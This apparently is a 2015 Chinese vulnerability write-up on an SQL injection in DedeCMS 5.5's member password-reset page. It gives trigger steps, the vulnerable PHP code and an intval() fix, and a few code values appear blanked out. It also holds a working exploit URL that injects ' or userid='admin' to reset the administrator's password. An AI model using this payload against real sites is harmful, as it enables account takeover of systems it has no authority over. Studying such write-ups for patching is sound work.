dedecms /member/resetpassword.php SQL Injection Vul

catalog

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

DEDEcms SQL注入漏洞导致可以修改任意用户密码

2. 漏洞触发条件

. 注册一个用户
. 找回密码，选择通过安全问题取回: http://localhost/dedecms5.5/member/resetpassword.php
. 填写完毕信息之后点击确认
. 然后点击确认，会跳转到这样一个URL上: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7
//黑客就可以构造EXP如下
http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222
//把上面url中的2改成之前跳转到链接的id参数，然后把key也改成之前跳转的链接的key参数
//然后userid可以修改成你需要修改密码的用户: admin
//pwd和pwdok就是需要修改成的密码必须保持一样: md5(111222)=00b7691d86d96aebd21dd9e138f90840

aaarticlea/png;base64,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" alt="" />

修改成功

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2010-042167

3. 漏洞影响范围
4. 漏洞代码分析

/member/resetpassword.php

..
elseif($dopost == "getpasswd")
{
    //修改密码
    if(empty($id))
    {
        ShowMsg("对不起，请不要非法提交","login.php");
        exit();
    }
    //只匹配出了所有的数字
    $mid = ereg_replace("[^0-9]","",$id);
    $row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'");
    if(empty($row))
    {
        ShowMsg("对不起，请不要非法提交","login.php");
        exit();
    }
    if(empty($setp))
    {
        $tptim= (***);
        $dtime = time();
        if($dtime - $tptim > $row['mailtime'])
        {
            $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
            ShowMsg("对不起，临时密码修改期限已过期","login.php");
            exit();
        }
        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
    }
    //攻击poc进入这个流支
    elseif($setp == )
    {
        if(isset($key))
        {
            $pwdtmp = $key;
        }
        $sn = md5(trim($pwdtmp));
        if($row['pwd'] == $sn)
        {
            if($pwd != "")
            {
                if($pwd == $pwdok)
                {
                    $pwdok = md5($pwdok);
                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
                    $db->executenonequery($sql);
                    //$id没有经过任何过滤就带入了SQL查询，导致了update注入
                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
                    if($db->executenonequery($sql))
                    ..

5. 防御方法

/member/resetpassword.php

/* 对$id变量进行规范化 */
$id = isset($id)? intval($id) : ;
/* */

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved